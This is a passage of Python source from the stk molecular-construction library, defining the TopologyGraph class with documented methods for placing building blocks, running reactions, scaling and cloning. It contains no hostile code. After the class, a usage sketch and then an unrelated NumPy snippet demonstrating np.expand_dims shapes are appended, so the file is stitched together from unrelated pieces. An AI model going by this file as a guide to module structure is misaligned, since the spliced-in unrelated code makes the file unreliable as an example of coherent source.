        vertices indicate where building blocks are placed and the
        edges indicate which building blocks have bonds formed between
        them by the construction process.

        :class:`.Vertex` instances are responsible for placing the
        building block molecules. By initializing the vertices with
        different parameters, you can alter how they position the
        building block molecules, and therefore allow the user to
        easily specify a different structural isomer.

        Once a building block is placed on a vertex, the functional
        groups on the building block must be mapped to the different
        edges connected to the vertex. The number of functional groups
        in the building block must match the number of edges connected
        to the vertex.

        Once the functional groups are mapped to edges, the edges are
        used to perform reactions on the building blocks. Edges are
        grouped in an :class:`.EdgeGroup`, and all functional groups
        present in the edge group are reacted together. Normally,
        unless you are doing something very exotic, an
        :class:`.EdgeGroup` will hold just one :class:`.Edge`, and the
        two functional groups on that edge will be reacted together
        through a single :class:`.Reaction`. This reaction will
        normally add the bonds which are required to form the joined-up
        constructed molecule, but note that it does not have to add any
        bonds at all. In addition, a :class:`.Reaction` can add and
        remove atoms from the constructed molecule. Which reaction is
        selected to join the functional groups depends on the
        :class:`.ReactionFactory` given to the :class:`.TopologyGraph`
        during initialization.

        Once this is done, you have a :class:`.ConstructedMolecule`.

    Examples:

        *Subclass Implementation*

        The source code of subclasses, listed in
        :mod:`~.topology_graph.topology_graph.topology_graph`, can
        serve as good examples.

        *Changing the Building Blocks of a Topology Graph*

        To change the building blocks used by a topology graph you can
        use :meth:`.with_building_blocks` to get a clone of the
        topology graph holding the new building blocks

        .. testcode:: changing-the-building-blocks-of-a-topology-graph

            import stk

            bb1 = stk.BuildingBlock('BrCCBr', [stk.BromoFactory()])
            bb2 = stk.BuildingBlock('BrCCCBr', [stk.BromoFactory()])
            linear = stk.polymer.Linear(
                building_blocks=(bb1, bb2),
                repeating_unit='AB',
                num_repeating_units=15,
            )

            bb3 = stk.BuildingBlock('BrCNCBr', [stk.BromoFactory()])
            # All bb1 instances are replaced by bb3, but bb2 remains
            # in place.
            clone = linear.with_building_blocks({
                bb1: bb3,
            })

    """

    _implementation: _TopologyGraphImplementation

    def __init__(
        self,
        building_block_vertices: dict[
            BuildingBlock,
            abc.Sequence[Vertex],
        ],
        edges: tuple[Edge, ...],
        reaction_factory: ReactionFactory,
        construction_stages: tuple[
            # TODO: Use typing.Callable here for now so that Sphinx
            # generates hyperlinks in the compiled docs. This should
            # eventually be replaced by abc.Callable.
            typing.Callable[[Vertex], bool],
            ...
        ],
        num_processes: int,
        optimizer: Optimizer,
        edge_groups: typing.Optional[tuple[EdgeGroup, ...]] = None,
    ) -> None:
        """
        Initialize an instance of :class:`.TopologyGraph`.

        Parameters:

            building_block_vertices:
                Maps each :class:`.BuildingBlock` to be placed, to the
                :class:`.Vertex` instances, on which it should be
                placed.

            edges:
                The edges which make up the topology graph.

            reaction_factory:
                Used to pick which :class:`.Reaction` is used on each
                :class:`.EdgeGroup` of the topology graph.

            construction_stages:
                A collection of :class:`~collections.abc.Callable`,
                each of which takes a :class:`.Vertex` and returns
                ``True`` or ``False``. If the first
                :class:`~collections.abc.Callable` is applied to a
                vertex in the topology graph, and the result is
                ``True``, that vertex is a part of the first
                construction stage. The second
                :class:`~collections.abc.Callable` is then applied to
                all vertices not in the first stage and those which
                return ``True`` belong to the second stage and so on.

                Vertices which belong to the same construction stage
                all place building blocks together in parallel, before
                placement is done by any vertices which are part of a
                later stage. This breaks down parallel construction
                into serial stages if synchronization between stages
                is needed.

                If the topology graph is performing construction
                serially, then all vertices which belong to an earlier
                stage will place their building block before those at
                a later stage.

            num_processes:
                The number of parallel processes to create during
                :meth:`construct`.

            optimizer:
                Used to optimize the structure of the constructed
                molecule.

            edge_groups:
                The edge groups of the topology graph. If ``None``,
                every :class:`.Edge` is in its own edge group.

        """

        self._scale = scale = self._get_scale(building_block_vertices)

        def apply_scale(item):
            return item.with_scale(scale)

        self._building_block_vertices = {
            building_block: tuple(map(apply_scale, vertices))
            for building_block, vertices
            in building_block_vertices.items()
        }
        self._edges = tuple(map(apply_scale, edges))
        self._reaction_factory = reaction_factory

        if num_processes == 1:
            self._implementation = _Serial(
                stages=tuple(self._get_stages(construction_stages)),
            )
        else:
            self._implementation = _Parallel(
                stages=tuple(self._get_stages(construction_stages)),
                num_processes=num_processes,
            )

        if edge_groups is None:
            edge_groups = tuple(
                EdgeGroup((edge, )) for edge in self._edges
            )
        self._edge_groups = edge_groups

        self._optimizer = optimizer

    def _with_building_blocks(
        self: _TopologyGraphT,
        building_block_map: dict[BuildingBlock, BuildingBlock],
    ) -> _TopologyGraphT:
        """
        Modify the topology graph.

        """

        # The original scaling first needs to be removed, so that when
        # the scale is recalculated with the new building blocks, it
        # has the same starting geometry.
        def undo_scale(vertex):
            return vertex.with_scale(1/self._scale)

        building_block_vertices: dict[
            BuildingBlock, abc.Sequence[Vertex]
        ]
        building_block_vertices = {
            building_block_map.get(building_block, building_block):
                tuple(map(undo_scale, vertices))
            for building_block, vertices
            in self._building_block_vertices.items()
        }
        scale = self._get_scale(building_block_vertices)

        def scale_vertex(vertex):
            return vertex.with_scale(scale)

        self._building_block_vertices = {
            building_block: tuple(map(scale_vertex, vertices))
            for building_block, vertices
            in building_block_vertices.items()
        }

        def scale_edge(edge):
            # Remove the old scale and apply the new one.
            return edge.with_scale(scale/self._scale)

        self._edges = edges = tuple(map(scale_edge, self._edges))

        def get_new_edge(edge_id):
            return edges[edge_id]

        self._edge_groups = tuple(
            EdgeGroup(map(get_new_edge, edge_group.get_edge_ids()))
            for edge_group in self._edge_groups
        )

        self._scale = scale
        return self

    def with_building_blocks(
        self,
        building_block_map: dict[BuildingBlock, BuildingBlock],
    ) -> TopologyGraph:
        """
        Return a clone holding different building blocks.

        Parameters:

            building_block_map:
                Maps a building block in the current topology graph to
                the building block which should replace it in the
                clone. If a building block should not be replaced in
                the clone, it can be omitted from the map.

        Returns:

            The clone.

        """

        return self.clone()._with_building_blocks(building_block_map)

    def clone(self) -> TopologyGraph:
        """
        Return a clone.

        Returns:

            The clone.

        """

        return self._clone()

    def _clone(self: _TopologyGraphT) -> _TopologyGraphT:
        clone = self.__class__.__new__(self.__class__)
        clone._scale = self._scale
        clone._building_block_vertices = dict(
            self._building_block_vertices
        )
        clone._edges = self._edges
        clone._reaction_factory = self._reaction_factory
        clone._implementation = self._implementation
        clone._optimizer = self._optimizer
        clone._edge_groups = self._edge_groups
        return clone

    def get_building_blocks(self) -> typing.Iterator[BuildingBlock]:
        """
        Yield the building blocks.

        Building blocks are yielded in an order based on their
        position in the topology graph. For two equivalent topology
        graphs, but with different building blocks, equivalently
        positioned building blocks will be yielded at the same time.

        Yields:

            A building block of the topology graph.

        """

        vertex_building_blocks = {}
        num_vertices = 0
        for building_block, vertices in (
            self._building_block_vertices.items()
        ):
            for vertex in vertices:
                num_vertices += 1
                vertex_building_blocks[vertex.get_id()] = (
                    building_block
                )

        yielded = set()
        for vertex_id in range(num_vertices):
            building_block = vertex_building_blocks[vertex_id]
            if building_block not in yielded:
                yielded.add(building_block)
                yield building_block

    def get_num_building_block(
        self,
        building_block: BuildingBlock,
    ) -> int:
        """
        Get the number of times `building_block` is present.

        Parameters:

            building_block:
                The building block whose frequency in the topology
                graph is desired.

        Returns:

            The number of times `building_block` is present in the
            topology graph.

        """

        return len(
            self._building_block_vertices.get(building_block, [])
        )

    def _get_lattice_constants(self) -> typing.Iterator[np.ndarray]:
        """
        Yield the lattice constants of the topology graph.

        The a, b and c lattice constants are yielded, in that order.
        By default, this is an empty generator.

        Yields:

            A lattice constant.

        """

        return
        yield

    def construct(self) -> ConstructionResult:
        """
        Construct a :class:`.ConstructedMolecule`.

        Returns:

            The data describing the :class:`.ConstructedMolecule`.

        """

        state = self._get_construction_state()
        state = self._place_building_blocks(state)
        state = self._run_reactions(state)
        state = self._optimizer.optimize(state)
        return self._get_construction_result(state)

    def _get_construction_result(
        self,
        state: ConstructionState,
    ) -> ConstructionResult:
        """
        Get the result of the construction.

        Parameters:

            state:
                The state of the molecule being constructed.

        Returns:

            The data describing the :class:`.ConstructedMolecule`.

        """

        return ConstructionResult(state)

    def _get_construction_state(self) -> ConstructionState:
        return ConstructionState(
            building_block_vertices=self._building_block_vertices,
            edges=self._edges,
            lattice_constants=tuple(
                np.array(constant, dtype=np.float64)*self._scale
                for constant in self._get_lattice_constants()
            ),
        )

    def _get_scale(
        self,
        building_block_vertices: dict[
            BuildingBlock,
            abc.Sequence[Vertex],
        ],
    ) -> float:
        """
        Get the scale, which should be applied to the topology graph.

        The scale should be applied to the position of every vertex
        and edge of the topology graph. This allows the graph to
        adjust based on the size of the building blocks.

        Parameters:

            building_block_vertices:
                Maps every :class:`.BuildingBlock` of the topology
                graph, to the :class:`.Vertex` instances it is meant
                to be placed on.

        Returns:

            The scale.

        """

        raise NotImplementedError()

    def _place_building_blocks(
        self,
        state: ConstructionState,
    ) -> ConstructionState:
        """
        Place the building blocks onto the vertices.

        Parameters:

            state:
                Holds data necessary to construct the molecule.

        Returns:

            The new construction state, updated to account for the
            placed building blocks.

        """

        return self._implementation._place_building_blocks(state)

    def _run_reactions(
        self,
        state: ConstructionState,
    ) -> ConstructionState:
        """
        Perform the reactions on the building blocks.

        Parameters:

            state:
                The current state of the construction process.

        Returns:

            The new construction state, updated to account for the
            reactions between building blocks.

        """

        get_reaction = partial(
            self._reaction_factory.get_reaction,
            state,
        )
        reactions = tuple(map(get_reaction, self._edge_groups))
        results = map(
            lambda reaction: reaction.get_result(),
            reactions,
        )
        return state.with_reaction_results(reactions, results)

    def _get_stages(
        self,
        construction_stages,
    ) -> typing.Iterator[tuple[int, ...]]:
        """
        Yield the parallelizable stages of construction.

        Yields:

            Vertex ids, which can be placed in parallel.

        """

        stages: tuple[list[int], ...] = tuple(
            [] for i in range(len(construction_stages)+1)
        )
        vertices = flatten(self._building_block_vertices.values())
        for vertex in vertices:
            placed = False
            for i, stage in enumerate(construction_stages):
                if stage(vertex):
                    stages[i].append(vertex.get_id())
                    placed = True
                    break
            if not placed:
                stages[-1].append(vertex.get_id())
        yield from (tuple(stage) for stage in stages if stage)

    def __str__(self) -> str:
        return repr(self)

    def __repr__(self) -> str:
        raise NotImplementedError()
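if __name__ == '__main__':
    # Hedged usage sketch, not part of the original module: construction
    # through a concrete TopologyGraph subclass. Requires stk to be
    # installed; stk.polymer.Linear is one such subclass.
    import stk

    bb = stk.BuildingBlock('BrCCBr', [stk.BromoFactory()])
    polymer = stk.ConstructedMolecule(
        topology_graph=stk.polymer.Linear(
            building_blocks=(bb, ),
            repeating_unit='A',
            num_repeating_units=3,
        ),
    )
    print(polymer)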
import numpy as np

x = np.array([1, 2])
print(x.shape)

y = np.expand_dims(x, axis=0)
print(y.shape)
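# Hedged addition, not in the original snippet: the printed shapes are (2,)
# and (1, 2); np.expand_dims inserts a length-1 axis at the requested
# position, so axis=1 would give (2, 1) instead.
assert y.shape == (1, 2)
assert np.expand_dims(x, axis=1).shape == (2, 1)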